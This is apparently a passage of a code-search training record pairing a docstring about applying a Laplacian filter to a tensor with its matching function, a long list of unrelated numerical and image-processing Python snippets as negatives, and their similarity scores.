w_ind:w_ind+Wk]\n # Sum the conv_value of all the inp_channels\n conv_layer[batch_i, o_chann_i, h_ind//stride, w_ind//stride] += np.sum(inp_patch*curr_ker)\n w_ind+=stride\n h_ind+=stride\n return conv_layer", "def _get_Laplacian_matrix(self, X):\n self.laplacian_mat, self.laplacian_sym_mat, self.laplacian_weights = self.laplacian.compute_laplacian(\n self.get_Affinity_matrix(X)\n )", "def algi(C):\n return np.array([ C[0,2], C[1,2], C[1,0] ])", "def generate_two_dim_step_matrices(self):\n Lap_h = two_dim_sparse_neumann_laplacian(self.M, format='csc')\n I_m = sp.identity(self.M * self.M, dtype='float64', format='csc')\n\n I_minus_Lap = spla.factorized(I_m - (self.r / 2.0) * Lap_h)\n I_plus_Lap = I_m + (self.r / 2.0) * Lap_h\n\n return I_minus_Lap, I_plus_Lap", "def c_():\r\n c = np.array([[0, 0], [0, 100], [100, 100], [100, 80], [20, 80],\r\n [20, 20], [100, 20], [100, 0], [0, 0]])\r\n return c", "def alloc2d(x,y,iv=0):\n return [[iv for j in range(int(x))] for i in range(int(y))]", "def conv_2D(img,kernel,stride=1):\n\n m,n = img.shape\n r,c = kernel.shape\n\n kernel = np.flip(kernel,axis=1)\n kernel = np.flip(kernel,axis=0)\n\n c_m, c_n = int(np.ceil((m-r+1)/stride)), int(np.ceil((n-c+1)/stride))\n img_conv = np.zeros((c_m,c_n),dtype=float)\n\n for i,j in it.product(range(c_m),range(c_n)):\n img_conv[i,j] = (img[i*stride:i*stride+r,j*stride:j*stride+c] * kernel).sum()\n\n return img_conv", "def downsample2d(inputArray, kernelSize):\n average_kernel = np.ones((kernelSize,kernelSize))\n\n blurred_array = sig.convolve2d(inputArray, average_kernel, mode='same')\n downsampled_array = blurred_array[::kernelSize,::kernelSize]\n return downsampled_array", "def load_kernel_laplacian(self, file):\n fp = open(file, \"rb\")\n kernel_laplacian = pd.read_csv(fp, sep=',')\n return kernel_laplacian", "def make_2d(x):\n return x.reshape((1, len(x)))", "def _laplacian_pyramid(batch, num_levels):\n gaussian_filter = constant_op.constant(_GAUSSIAN_FILTER)\n\n def spatial_conv(batch, gain):\n s = array_ops.shape(batch)\n padded = array_ops.pad(batch, [[0, 0], [2, 2], [2, 2], [0, 0]], 'REFLECT')\n xt = array_ops.transpose(padded, [0, 3, 1, 2])\n xt = array_ops.reshape(xt, [s[0] * s[3], s[1] + 4, s[2] + 4, 1])\n conv_out = nn_ops.conv2d(xt, gaussian_filter * gain, [1] * 4, 'VALID')\n conv_xt = array_ops.reshape(conv_out, [s[0], s[3], s[1], s[2]])\n conv_xt = array_ops.transpose(conv_xt, [0, 2, 3, 1])\n return conv_xt\n\n def pyr_down(batch): # matches cv2.pyrDown()\n return spatial_conv(batch, 1)[:, ::2, ::2]\n\n def pyr_up(batch): # matches cv2.pyrUp()\n s = array_ops.shape(batch)\n zeros = array_ops.zeros([3 * s[0], s[1], s[2], s[3]])\n res = array_ops.concat([batch, zeros], 0)\n res = array_ops.batch_to_space(res, crops=[[0, 0], [0, 0]], block_size=2)\n res = spatial_conv(res, 4)\n return res\n\n pyramid = [math_ops.to_float(batch)]\n for _ in range(1, num_levels):\n pyramid.append(pyr_down(pyramid[-1]))\n pyramid[-2] -= pyr_up(pyramid[-1])\n return pyramid", "def to_2d_array(self):\n return reshape_fns.to_2d(self._obj, raw=True)", "def convolve(self, kernel):\n kernel_rows, kernel_cols = kernel.shape\n img_rows, img_cols = self.img_array.shape\n\n print(\"imgae shape: \", self.img_array.shape)\n print(self.img_array[:10,:10])\n\n # flip the kernel\n flipped_kernel = np.zeros(kernel.shape)\n \n ## column flips\n for i in range(flipped_kernel.shape[1]):\n flipped_kernel[:,i] = kernel[:,kernel_cols-i-1]\n kernel = flipped_kernel.copy()\n\n ## row flips\n for i in range(flipped_kernel.shape[0]):\n flipped_kernel[i,:] = kernel[kernel_rows-i-1,:]\n kernel = flipped_kernel.copy()\n print(\"Flipped kernel:\\n\", kernel)\n\n # Handle broders by padding the image with white pixels.\n ## padwidth = kernel_rows // 2 \n padwidth = kernel_rows // 2\n self.img_array_padded = np.pad(self.img_array, padwidth, \n mode='constant', constant_values=255)\n \n # cross correlation\n self.img_array_out = np.zeros(self.img_array.shape)\n\n for y in range(img_cols):\n for x in range(img_rows):\n self.img_array_out[x, y] = \\\n (kernel * self.img_array_padded[x:x+kernel_cols, y:y+kernel_rows]).sum()\n \n # print(self.img_array_out.shape)\n # print(self.img_array_out[:10,:10])\n return self.img_array_out", "def flat_to_2d(data, det_width):\n return data.reshape((data.shape[0], data.shape[1], det_width, det_width))", "def laplacianEdgeDetector(img):\n laplacian_kernel = np.array([[0,1,0],\\\n [1,-4,1],\\\n [0,1,0]])\n return convolve2d(img, laplacian_kernel, mode='same')", "def _kernel_F2(matrix_in) -> List[np.ndarray]: # pylint: disable=invalid-name\n size = matrix_in.shape\n kernel = []\n matrix_in_id = np.vstack((matrix_in, np.identity(size[1])))\n matrix_in_id_ech = (_row_echelon_F2(matrix_in_id.transpose())).transpose()\n\n for col in range(size[1]):\n if np.array_equal(\n matrix_in_id_ech[0 : size[0], col], np.zeros(size[0])\n ) and not np.array_equal(matrix_in_id_ech[size[0] :, col], np.zeros(size[1])):\n kernel.append(matrix_in_id_ech[size[0] :, col])\n\n return kernel", "def one_dim_sparse_laplacian(m: int):\n return sp.diags([1.0, -2.0, 1.0], [-1, 0, 1], dtype='float64', shape=(m, m), format='lil')", "def sub_kernel(kernel, dim1, dim2):\n\n sub_kernel = kernel[dim1[0]:dim1[1],dim2[0]:dim2[1]]\n return sub_kernel", "def convolution(image: np.array, kernel: np.array) -> np.array:\n\n # default condition: apply SAME padding, and keep stride at 1\n stride_x = 1\n stride_y = 1\n padding_y = int(len(kernel - 1) / 2)\n padding_x = int(len((kernel[0]) - 1) / 2)\n # create the return array with with the same dimensions as <image>,\n # and then create a padded image\n convolved_image = np.zeros((len(image), len(image[0])))\n padded_image = np.zeros((len(image) + 2 * padding_y,\n len(image[0]) + 2 * padding_x))\n padded_image[padding_x: -padding_x, padding_y: -padding_y] = image\n\n for py in range(0, len(padded_image) - len(kernel), stride_y):\n for px in range(0, len(padded_image[0]) - len(kernel[0]), stride_x):\n # scan the matrix over columns in image array, then shift the matrix\n # down, and repeat\n padded_image_section = padded_image[py: py + len(kernel[0]),\n px: px + len(kernel)]\n # print(padded_image_section)\n convolved_image[py, px] = int(np.tensordot(padded_image_section,\n kernel))\n\n return convolved_image", "def getIntArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def reconstructFromLaplacianPyramid(pyramid):\n \n nLevels = len(pyramid)\n out = pyramid[-1]\n if len(pyramid) == 1:\n return out\n\n useStack = False\n if pyramid[0].shape[0:2] == pyramid[-1].shape[0:2]:\n useStack = True\n\n dtp = out.dtype\n for i in range(nLevels-2,-1,-1):\n newSz = pyramid[i].shape[0:2]\n if useStack:\n up = out\n else:\n up = cv2.pyrUp(out,dstsize=(newSz[1],newSz[0]))\n if len(up.shape) < 3:\n up.shape += (1,)\n out = up + pyramid[i]\n out = out.astype(dtp)\n\n return out", "def discreteConvolution2D( iImage, iKernel ): \n # pretvori vhodne spremenljivke v np polje in\n # inicializiraj izhodno np polje\n iImage = np.asarray( iImage )\n iKernel = np.asarray( iKernel )\n #------------------------------- za hitrost delovanja\n oImage = ni.convolve( iImage, iKernel, mode='nearest' ) \n return oImage", "def uniform_laplacian(image, radius=1):\n height, width = image.shape[:2]\n window_size = 2 * radius + 1\n\n W = sparse_conv_matrix(width, height, np.ones((window_size, window_size)))\n\n return weights_to_laplacian(W)", "def numpy_compute_kernel_matrices(x, x_star, sigma_f=1, l=1):\r\n start_time = time()\r\n\r\n\r\n xx, yy = np.meshgrid(x, x, sparse=True)\r\n xx_star2, yy_star2 = np.meshgrid(x_star, x_star, sparse=True)\r\n xx_star, yy_star = np.meshgrid(x, x_star, sparse=True)\r\n\r\n K = kernel_function_1D(xx, yy, sigma_f, l)\r\n K_star2 = kernel_function_1D(xx_star2, yy_star2, sigma_f, l)\r\n K_star = kernel_function_1D(xx_star, yy_star, sigma_f, l)\r\n\r\n print(\"--- %s ---\" % seconds_to_str((time() - start_time)))\r\n\r\n return (K, K_star2, K_star)", "def _laplacian_to_image(lpyr, filter_vec, coeff):\n im = lpyr[-1]\n filter_vec = filter_vec.reshape(filter_vec.size, 1)\n for i in reversed(range(len(lpyr) - 1)):\n im = _expand(im, filter_vec) + coeff[i] * lpyr[i]\n\n return im", "def kernel_temp(self, x):\n x = np.atleast_2d(x)\n n, d = x.shape\n\n # Vectorized implementation\n kxx = self.kernel(x, x) # (n, n)\n assert_shape(kxx, (n, n))\n\n k_xx = np.zeros((n, n, d))\n k_x_x = np.zeros((n, n, d))\n\n for l in xrange(d):\n if l % 100 == 0:\n print \"\\tkxx, k_xx, k_x_x: l = %d ...\" % l\n\n neg_l_x = self.neg_inv(x, l)\n k_xx[:, :, l] = self.kernel(neg_l_x, x)\n k_x_x[:, :, l] = self.kernel(neg_l_x, neg_l_x)\n\n return [kxx, k_xx, k_x_x]", "def call(self, inputs, training=None):\n with tf.device(\"/device:GPU:0\"):\n return tf.reshape(tf.einsum('bj,jk,bk->b', inputs, self.laplacian, inputs), (-1, 1))", "def cartesian2bary(self, x):\n lam = np.zeros((x.shape[0], 3))\n lam[:,:2] = np.einsum('ij,kj->ki', self.Tinv, x - self.xv[2])\n lam[:,2] = 1. - lam[:,0] - lam[:,1]\n return lam", "def linear_kernel_pure(X, Y=None):\n X, Y = _check_pairwise_arrays(X, Y)\n return dot_2d(X, Y)", "def lap2D(self, lat):\n lap = np.roll(lat, 1, 0) + np.roll(lat, -1, 0) + \\\n np.roll(lat, 1, 1) + np.roll(lat, -1, 1) - \\\n 4. * lat\n lap = 1./self.dx**2. * lap\n # print(lap[50][50])\n return(lap)", "def convolve_2d(image: xr.DataArray,\n kernel,\n pad=True,\n use_cuda=True) -> xr.DataArray:\n # Don't allow padding on (1, 1) kernel\n if (kernel.shape[0] == 1 and kernel.shape[1] == 1):\n pad = False\n\n if pad:\n pad_rows = kernel.shape[0] // 2\n pad_cols = kernel.shape[1] // 2\n pad_width = ((pad_rows, pad_rows),\n (pad_cols, pad_cols))\n else:\n # If padding is not desired, set pads to 0\n pad_rows = 0\n pad_cols = 0\n pad_width = 0\n\n padded_image = np.pad(image, pad_width=pad_width, mode=\"reflect\")\n result = np.empty_like(padded_image)\n\n if has_cuda() and use_cuda:\n griddim, blockdim = cuda_args(padded_image.shape)\n _convolve_2d_cuda[griddim, blockdim](result, kernel, padded_image)\n else:\n result = _convolve_2d(kernel, padded_image)\n\n if pad:\n result = result[pad_rows:-pad_rows, pad_cols:-pad_cols]\n\n if result.shape != image.shape:\n raise ValueError(\"Output and input rasters are not the same shape.\")\n\n return result", "def get_laplacian(adjacency: sparse.csr_matrix) -> sparse.csr_matrix:\n weights = adjacency.dot(np.ones(adjacency.shape[0]))\n return sparse.diags(weights) - adjacency", "def kde_2d_multiple_times(plume_x, plume_y, X, Y):\n Z = []\n positions = np.vstack([X.ravel(), Y.ravel()])\n for i in range(len(plume_x)):\n values = np.vstack([plume_x[i], plume_y[i]])\n kernel = stats.gaussian_kde(values)\n Z.append(np.reshape(kernel(positions).T, X.shape))\n return Z", "def get_kernel_matrix(self):\n with self.get_lock().read_lock():\n return self._kernel", "def l2_square_from_inner_product(matrix):\n return np.diag(matrix)", "def sharp_laplace2(img):\n\n # the laplacian kernel\n laplace_kern = np.array([[-1., -1., -1.],\n [-1., 0., -1.],\n [-1., -1., -1.]])\n\n # See laplace 1 above for the following lines\n img = np.asarray(img, dtype=np.int)\n sharp = img + ndi.convolve(img, laplace_kern)\n\n return np.asarray(np.clip(sharp, 0, 255), dtype=np.uint8)", "def nodalLaplacian(self):\n if getattr(self, '_nodalLaplacian', None) is None:\n print('Warning: Laplacian has not been tested rigorously.')\n # The number of cell centers in each direction\n n = self.vnC\n # Compute divergence operator on faces\n if(self.dim == 1):\n D1 = sdiag(1./self.hx) * ddx(self.nCx)\n L = - D1.T*D1\n elif(self.dim == 2):\n D1 = sdiag(1./self.hx) * ddx(n[0])\n D2 = sdiag(1./self.hy) * ddx(n[1])\n L1 = sp.kron(speye(n[1]+1), - D1.T * D1)\n L2 = sp.kron(- D2.T * D2, speye(n[0]+1))\n L = L1 + L2\n elif(self.dim == 3):\n D1 = sdiag(1./self.hx) * ddx(n[0])\n D2 = sdiag(1./self.hy) * ddx(n[1])\n D3 = sdiag(1./self.hz) * ddx(n[2])\n L1 = kron3(speye(n[2]+1), speye(n[1]+1), - D1.T * D1)\n L2 = kron3(speye(n[2]+1), - D2.T * D2, speye(n[0]+1))\n L3 = kron3(- D3.T * D3, speye(n[1]+1), speye(n[0]+1))\n L = L1 + L2 + L3\n self._nodalLaplacian = L\n return self._nodalLaplacian", "def blockshaped(input_suduko_2d):\n h = input_suduko_2d.shape[0]\n return (input_suduko_2d.reshape(h // 3, 3, -1, 3)\n .swapaxes(1, 2)\n .reshape(-1, 3, 3))", "def LaplacianMatrix(adjmatrix):\n if adjmatrix.dtype in [np.uint, np.uint0, np.uint8, np.uint16, np.uint32, np.uint64]:\n adjmatrix = adjmatrix.astype(int)\n N = len(adjmatrix)\n\n laplacianmatrix = np.identity(N, dtype=adjmatrix.dtype) * adjmatrix.sum(axis=1)\n laplacianmatrix -= adjmatrix\n\n return laplacianmatrix", "def _make_2x2(self, A11, A12, A21, A22, dtype=float):\n array = np.empty((2,2), dtype=dtype)\n array[0,0] = A11\n array[0,1] = A12\n array[1,0] = A21\n array[1,1] = A22\n return array", "def mult_L(self) -> np.ndarray:\n return np.array([\n [self.w, -self.x, -self.y, -self.z],\n [self.x, self.w, -self.z, self.y],\n [self.y, self.z, self.w, -self.x],\n [self.z, -self.y, self.x, self.w]])", "def conv2d(\n input: np.ndarray,\n weight: np.ndarray,\n bias: np.ndarray = None,\n stride: int = 1,\n padding: int = 0,\n groups: int = 1,\n dilation: int = 0,\n) -> np.ndarray:\n if input.ndim == 3:\n input = np.expand_dims(input, axis=0)\n assert dilation == 0, \"dilation > 0 not supported yet.\"\n assert input.ndim == weight.ndim\n assert weight.shape[1] * groups == input.shape[1]\n if bias is None:\n bias = np.zeros((weight.shape[0],))\n assert weight.shape[0] == bias.shape[0]\n assert weight.shape[2] == weight.shape[3], \"non-equal kernel size not supported\"\n C_out, _, K, _ = weight.shape\n padded_input = np.pad(\n input, ((0, 0), (0, 0), (padding, padding), (padding, padding)), constant_values=0.0\n )\n N, C_in, H, W = padded_input.shape\n C_in_grp = C_in // groups # C_in group size\n C_out_grp = C_out // groups # C_out group size\n out = []\n for g in range(groups):\n input_g = padded_input[:, g * C_in_grp : (g + 1) * C_in_grp]\n weight_g = weight[g * C_out_grp : (g + 1) * C_out_grp, ...]\n bias_g = bias[g * C_out_grp : (g + 1) * C_out_grp]\n out_g = np.zeros((N, C_out_grp, (H - K + 1) // stride, (W - K + 1) // stride))\n for i in range((H - K + 1) // stride):\n for j in range((W - K + 1) // stride):\n si, sj = stride * i, stride * j\n input_block = input_g[:, None, :, si : si + K, sj : sj + K]\n out_g[:, :, i, j] = (input_block * weight_g).reshape(N, C_out_grp, -1).sum(\n axis=2\n ) + bias_g[None, :]\n out.append(out_g)\n return np.concatenate(out, axis=1)", "def laplacian(self, array_in):\r\n\r\n # Call-through to Laplacian operator, already computed\r\n return self.laplace_op*array_in", "def conv2d_v2(input, # pylint: disable=redefined-builtin\n filters,\n strides,\n padding,\n data_format=\"NHWC\",\n dilations=None,\n name=None):\n # pylint: disable=line-too-long\n # pylint: enable=line-too-long\n return conv2d(input, # pylint: disable=redefined-builtin\n filters,\n strides,\n padding,\n use_cudnn_on_gpu=True,\n data_format=data_format,\n dilations=dilations,\n name=name)", "def filter2D(img, kernel = (5,5)):\n\ttmp = img.copy()\n\tk = np.ones((kernel[0], kernel[1]), np.float32) / (kernel[0]*kernel[1])\n\tdst = cv2.filter2D(tmp, -1, k)\n\treturn dst", "def _minmaxkernel_numpy(data_1, data_2):\n return np.stack([(np.minimum(data_1, data_2[cpd,:]).sum(axis=1) / np.maximum(data_1, data_2[cpd,:]).sum(axis=1)) for cpd in range(data_2.shape[0])],axis=1)", "def GetKernel(self) -> \"itkFlatStructuringElement2 const &\":\n return _itkClosingByReconstructionImageFilterPython.itkClosingByReconstructionImageFilterIUS2IUS2SE2_GetKernel(self)", "def image_batch():\n return np.zeros((2, 1, 4, 4))", "def get_kernel_norms(self):\n return np.einsum('ijk->ij', self.amplitudes)", "def nd_kernel(n):\n n = int(n)\n total_size = 3**n\n mid_point = int((3**n - 1)/2)\n kern = np.zeros(total_size, dtype=bool)\n for i in range(n):\n kern[mid_point-3**i] = True\n kern[mid_point+3**i] = True\n new_shape = 3*np.ones(n, dtype=int) \n unnormed_kern = kern.reshape(new_shape)\n return unnormed_kern/unnormed_kern.sum()", "def conv_nested(image, kernel):\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n out = np.zeros((Hi, Wi))\n\n H = Hk // 2\n W = Wk // 2\n for i1 in range(Hi):\n for j1 in range(Wi):\n for i2 in range(Hk):\n for j2 in range(Wk):\n i = i2 - H\n j = j2 - W\n if i1-i<0 or j1-j<0 or i1-i>=Hi or j1-j>=Wi:\n continue\n out[i1, j1] += kernel[i2, j2]*image[i1-i, j1-j]\n return out", "def getNormLaplacian(W):\n\td=[np.sum(row) for row in W]\n\tD=np.diag(d)\n\tL=D-W\n\t#Dn=D^(-1/2)\n\tDn=np.power(np.linalg.matrix_power(D,-1),0.5)\n\tLbar=np.dot(np.dot(Dn,L),Dn)\n\treturn Lbar", "def binary_opening2d(value, kernel, stride=1, padding=\"SAME\"):\n out = binary_erosion2d(value, kernel, stride, padding)\n out = binary_dilation2d(out, kernel, stride, padding)\n return out", "def _build_laplacian_pyramid(im, max_levels, filter_size):\n filter_vec = _gaussian_kernel_1d(filter_size).reshape(filter_size, 1)\n pyr = []\n im_curr = im\n im_next = _reduce(im, filter_vec)\n while _image_is_large_enough(im_next) and len(pyr) < max_levels - 1:\n pyr.append(im_curr - _expand(im_next, filter_vec))\n im_curr = im_next\n im_next = _reduce(im_curr, filter_vec)\n\n pyr.append(im_curr)\n\n return pyr, filter_vec.reshape(1, filter_size)", "def kernel(self):\n\n # Create a blank kernel the appropriate size\n kernel = np.zeros((self.n_rows, self.n_cols), dtype=np.int)\n\n # Iterate through the offsets, turning on the correct pixels\n for offset in self.offsets:\n row, col = offset\n if np.all(offset == self.index):\n kernel[row, col] = 2\n else:\n kernel[row, col] = 1\n\n # Ensure that the index pixel is not zero for footprints where the\n # index pixel is not part of the footprint\n if kernel[self.index[0], self.index[1]] == 0:\n kernel[self.index[0], self.index[1]] = 3\n return kernel", "def _e_2d_(p, a):\r\n diff = a - p[np.newaxis, :]\r\n return np.einsum('ij,ij->i', diff, diff)", "def conv_matrix(matrix, kernel):", "def even_kernel(mu, N):\n\n # Check that -1 <= mu <= 1\n mu = np.clip(mu, -1, 1)\n\n # Need Legendre polynomials\n legPolys = legp(mu, N)\n \n\n coefs = 2*np.arange(0, N+1) + 1\n \n ker = coefs[0::2]*legPolys[0::2] \n\n return ker.sum() / (4.0*np.pi)", "def create_kernel(shape):\n indices = np.array(list(itertools.product([-1, 0],\n repeat=len(shape))))\n ref = np.sum(indices[0]) & 1\n parity = np.array([1 if (-sum(i) & 1) == ref else -1 for i in indices])\n indices = tuple([indices[:, i] for i in range(indices.shape[1])])\n kernel = np.zeros(shape, dtype=np.float32)\n kernel[indices] = parity\n return kernel", "def ikle2(self):\n if self._ikle2 is None:\n if self.nplan > 1:\n self._ikle2 = np.compress(np.repeat([True, False], self.ndp2),\n self.ikle3[0:self.nelem2], axis=1)\n else:\n self._ikle2 = self.ikle3\n\n return self._ikle2", "def curvature_matrix_diag(self) -> np.ndarray:\r\n\r\n if self.settings.use_w_tilde_numpy:\r\n return inversion_util.curvature_matrix_via_w_tilde_from(\r\n w_tilde=self.w_tilde.w_matrix, mapping_matrix=self.mapping_matrix\r\n )\r\n\r\n from autoarray.inversion.inversion import inversion_util_secret\r\n\r\n mapper = self.cls_list_from(cls=AbstractMapper)[0]\r\n\r\n if not self.settings.use_source_loop:\r\n return inversion_util_secret.curvature_matrix_via_w_tilde_curvature_preload_interferometer_from(\r\n curvature_preload=self.w_tilde.curvature_preload,\r\n pix_indexes_for_sub_slim_index=mapper.pix_indexes_for_sub_slim_index,\r\n pix_size_for_sub_slim_index=mapper.pix_sizes_for_sub_slim_index,\r\n pix_weights_for_sub_slim_index=mapper.pix_weights_for_sub_slim_index,\r\n native_index_for_slim_index=self.transformer.real_space_mask.derive_indexes.native_for_slim,\r\n pix_pixels=self.linear_obj_list[0].params,\r\n )\r\n\r\n (\r\n sub_slim_indexes_for_pix_index,\r\n sub_slim_sizes_for_pix_index,\r\n sub_slim_weights_for_pix_index,\r\n ) = mapper.sub_slim_indexes_for_pix_index_arr\r\n\r\n return inversion_util_secret.curvature_matrix_via_w_tilde_curvature_preload_interferometer_from_2(\r\n curvature_preload=self.w_tilde.curvature_preload,\r\n native_index_for_slim_index=self.transformer.real_space_mask.derive_indexes.native_for_slim,\r\n pix_pixels=self.linear_obj_list[0].params,\r\n sub_slim_indexes_for_pix_index=sub_slim_indexes_for_pix_index.astype(\"int\"),\r\n sub_slim_sizes_for_pix_index=sub_slim_sizes_for_pix_index.astype(\"int\"),\r\n sub_slim_weights_for_pix_index=sub_slim_weights_for_pix_index,\r\n )", "def C2D(self, temperature: float = None) -> ArrayLike:\n t = temperature\n n1 = self.nu(t) / (1 - self.nu(t))\n n2 = (1 - 2 * self.nu(t)) / (2 * (1 - self.nu(t)))\n\n C = np.array([[ 1, n1, 0],\n [n1, 1, 0],\n [ 0, 0, n2]], dtype=float)\n C *= self.E(t) * (1 - self.nu(t)) / ((1 + self.nu(t)) * (1 - 2 * self.nu(t)))\n return C", "def l2(u: np.ndarray, v: np.ndarray) -> np.ndarray:\n\n return (u - v) ** 2", "def convolve_spikes(spikes,kernel):\n output = np.zeros((spikes.shape[0]+kernel.shape[0]+1,kernel.shape[1]))\n for i in np.where(spikes)[0]:\n output[(i+1):(i+1+kernel.shape[0]),:] = output[(i+1):(i+1+kernel.shape[0]),:] + kernel\n return output[:len(spikes),:]", "def vvc_filters_2d(kernel_size):\n vvc_filters = []\n half_kernel = (kernel_size - 8) // 2\n for frac_pos in frac_positions():\n filter_x = filter_coefficients(int(frac_pos.split(\",\")[0]))\n filter_y = filter_coefficients(int(frac_pos.split(\",\")[1]))\n\n filter_vvc = np.tile(filter_x, 8).reshape((8, 8))\n for index in range(len(filter_y)):\n filter_vvc[index, :] *= filter_y[index]\n filter_vvc = filter_vvc / (64 * 64)\n\n vvc_filters.append(np.pad(filter_vvc, ((half_kernel + 1, half_kernel), (half_kernel + 1, half_kernel)),\n 'constant', constant_values=0))\n return vvc_filters", "def build_laplacian_pyramid(im, max_levels, filter_size):\n filter_vec = gaus_1d(filter_size).reshape(1, filter_size)\n g_pyr = build_gaussian_pyramid(im, max_levels, filter_size)[0]\n l_pyr = []\n for i in range(len(g_pyr) - 1):\n l_im = g_pyr[i] - expand_im(g_pyr[i + 1], filter_vec)\n l_pyr.append(l_im)\n\n l_pyr.append(g_pyr[-1])\n return [l_pyr, filter_vec]", "def deconvolve2d(x, y, stride=1, pad=0, shape=None):\n deconv = Deconvolve2dFunction(y.shape[:2], y.shape[2], stride, pad, shape)\n return deconv.forward(x, y.reshape(-1, y.shape[-1]))", "def kernel_diff2_tr(self, x, kernel_res):\n x = np.atleast_2d(x)\n\n n = x.shape[0]\n d = x.shape[1]\n\n kxx, k_xx, k_x_x = kernel_res\n\n assert_shape(kxx, (n, n))\n assert_shape(k_xx, (n, n, d))\n assert_shape(k_x_x, (n, n, d))\n\n k_xx_tr = np.sum(k_xx, axis=-1)\n k_x_x_tr = np.sum(k_x_x, axis=-1)\n\n res = kxx*d - k_xx_tr - k_xx_tr.T + k_x_x_tr # (n, n)\n\n return res", "def _get_n2(self) -> np.ndarray:\n n2_disp1d = np.arange(-self.N + 1, self.N + 1) ** 2\n\n n2 = np.sum(\n [el.flatten() for el in np.meshgrid(*[n2_disp1d] * self._ndim)], axis=0\n )\n if self.spherical:\n n2 = np.array([el for el in n2 if el < self.N ** 2])\n return n2", "def conv(image, kernel):\n Hi, Wi = image.shape\n Hk, Wk = kernel.shape\n out = np.zeros((Hi, Wi))\n\n # For this assignment, we will use edge values to pad the images.\n # Zero padding will make derivatives at the image boundary very big,\n # whereas we want to ignore the edges at the boundary.\n pad_width0 = Hk // 2\n pad_width1 = Wk // 2\n pad_width = ((pad_width0,pad_width0),(pad_width1,pad_width1))\n padded = np.pad(image, pad_width, mode='edge')\n\n ### YOUR CODE HERE\n for i in range(Hi):\n for j in range(Wi):\n out[i,j] = np.sum(padded[i : i + Hk, j : j + Wk] * np.flip(kernel))\n ### END YOUR CODE\n\n return out", "def init_two_d_array(dimens, val):\n w, x = dimens\n return [[val for j in range(x)] for i in range(w)]", "def one_dim(a: cython.double[:]):\n a[0] *= 2\n return a[0], a.ndim", "def even_kernel_der(mu, N):\n\n # Check that -1 <= mu <= 1\n mu = np.clip(mu, -1, 1)\n\n #Derivatives of Legendre polynomials\n DlegPolys = legp_der(mu, N)\n \n coefs = 2*np.arange(0, N+1) + 1\n \n ker = coefs[0::2]*DlegPolys[0::2] \n\n return ker.sum() / (4.0*np.pi)", "def getDoubleArray2D(self) -> typing.List[typing.List[float]]:\n ...", "def _compute_spatial_gradient_kernel(ndim=1):\n\n # 1D differential element\n dq = np.array([-1., 1.]) / 2.\n\n # replicate dq ndim times\n while len(dq.shape) != ndim:\n dq = np.array([dq, ] * ndim)\n\n # return gradient kernel\n return np.array([dq.swapaxes(ndim - 1 - q, -1)\n for q in xrange(ndim)])", "def pool2d(_w_in, k, *, stride=1):\n assert k % 2 == 1, \"Only odd size kernels supported to avoid padding issues.\"\n return nn.MaxPool2d(k, stride=stride, padding=(k - 1) // 2)", "def get_blur_kernel(n):\n return [1/n**2] * n**2", "def to_2dnp_array(X):\r\n if isinstance(X, np.ndarray):\r\n if X.ndim == 1:\r\n return X.reshape((-1, 1))\r\n if X.ndim == 2:\r\n return X\r\n if isinstance(X, Number):\r\n X = [X]\r\n X = np.array(X)\r\n X = X.reshape([-1, np.prod(X.shape) // X.shape[0]])\r\n return X", "def gen_cluster_arr(self, data, stop):\n\n keep = ((data[2,:] > stop*data[3,:]))\n cluster_arr = -np.ones((2,len(data[0,:])), dtype = 'i4')\n cluster_arr = cluster_arr[:,keep]\n\n return cluster_arr", "def row_conv2d(inputs, kernel, kernel_size, strides, output_shape, data_format=None):\n data_format = K.normalize_data_format(data_format)\n\n stride_row, stride_col = strides\n output_row, output_col = output_shape\n\n out = []\n for i in range(output_row):\n # Slice the rows with the neighbors they need\n slice_row = slice(i * stride_row, i * stride_col + kernel_size[0])\n if data_format == 'channels_first':\n x = inputs[:, :, slice_row, :] # batch, 16, 5, 144\n else:\n x = inputs[:, slice_row, :, :] # batch, 5, 144, 16\n # Convolve, resulting in an array with only one row: batch, 1, 140, 6 or batch, 6, 1, 140\n x = K.conv2d(x, kernel[i], strides=strides, padding='valid', data_format=data_format)\n out.append(x)\n\n if data_format == 'channels_first':\n output = K.concatenate(out, axis=2)\n else:\n output = K.concatenate(out, axis=1)\n del x\n del out\n return output", "def as_2d_array(theta):\n v = theta.view(np.float)\n N = theta.shape[0]\n v.shape = (N, - 1)\n # raise an error if v cannot be reshaped without creating a copy\n return v" ]
[ "0.68943256", "0.5928996", "0.5873876", "0.5794534", "0.5719824", "0.568754", "0.5661878", "0.56419665", "0.5635752", "0.5564691", "0.5545013", "0.553446", "0.54953605", "0.5416252", "0.5343913", "0.53213376", "0.5320362", "0.5318403", "0.5306929", "0.5298269", "0.52873653", "0.52752477", "0.5268715", "0.52602845", "0.52582073", "0.52154315", "0.5209422", "0.52089924", "0.5206422", "0.51987153", "0.5190397", "0.5186737", "0.5172944", "0.51720154", "0.51613915", "0.5152153", "0.51361245", "0.5100762", "0.5099215", "0.5093434", "0.5089017", "0.508292", "0.5077209", "0.50702816", "0.5064004", "0.5063186", "0.50584793", "0.50528204", "0.50520617", "0.5033679", "0.5032409", "0.50253236", "0.50177515", "0.5011217", "0.5000478", "0.49957487", "0.49881244", "0.498127", "0.4967551", "0.49665615", "0.49534515", "0.4943306", "0.49291173", "0.49252707", "0.49235228", "0.49230668", "0.4917709", "0.49166536", "0.49165803", "0.49107826", "0.4909897", "0.4908721", "0.49041834", "0.48932642", "0.48819712", "0.48672304", "0.48671964", "0.4856767", "0.48562926", "0.48547643", "0.48538443", "0.48503006", "0.48499", "0.48419273", "0.4834408", "0.48323083", "0.48309708", "0.48279345", "0.4824142", "0.4818578", "0.4816162", "0.48064858", "0.480414", "0.4804122", "0.48034212", "0.48029962", "0.48025203", "0.4801922", "0.47973344", "0.47954923" ]
0.66206235
1
r"""Function that returns a tensor using a Laplacian filter. The operator smooths the given tensor with a laplacian kernel by convolving it to each channel. It suports batched operation.
def laplacian(src: torch.Tensor, kernel_size: int) -> torch.Tensor: return Laplacian(kernel_size)(src)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
